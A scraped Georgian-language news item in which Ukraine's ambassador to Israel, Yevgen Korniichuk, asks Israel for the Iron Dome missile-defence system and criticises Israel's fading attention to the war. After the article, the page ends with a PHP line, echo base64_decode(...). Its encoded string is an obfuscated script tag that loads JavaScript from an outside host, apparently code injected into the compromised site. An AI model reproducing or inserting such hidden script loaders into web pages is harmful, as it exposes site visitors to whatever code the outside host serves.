celsiusi
ავერსი შნაიდერი
უკრაინას ისრაელისგან სარაკეტო თავდაცვის სისტემის, "რკინის გუმბათის" შეძენას ითხოვს. ამის შესახებ ისრაელში უკრაინის ელჩმა ევგენ კორნიიჩუკმა განაცხადა.
 
"მინდა, ისრაელის მთავრობამ კომფორტის ზონა დატოვოს და რეალობას დაუბრინდეს. ჩვენ ისრაელის დახმარება გვჭირდება. გვჭირდება სამხედრო-ტექნიკური მხარდაჭერა, ასევე რკინის გუმბათი, რომელიც მოგვცემს საშუალებას, გადავარჩინოთ მშვიდობიანი ქალები და ბავშვები რუსული რაკეტებით დაბომბვისგან" - თქვა მან. 
 
როგორც ელჩმა აღნიშნა, ისრაელი უკრაინის ომზე ორიენტირებული აღარაა და მედიასაშუალებები თითქმის აღარ აშუქებენ ამ საკითხს. ელჩი თვლის, რომ ეს ომის მიმართ ისრაელის ხელისუფლების უკმაყოფილების გამოხატულებაა და მათთვის ამ პროცესის უკანა პლანზე გადაწევა კომფორტულია.
 
 
753
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");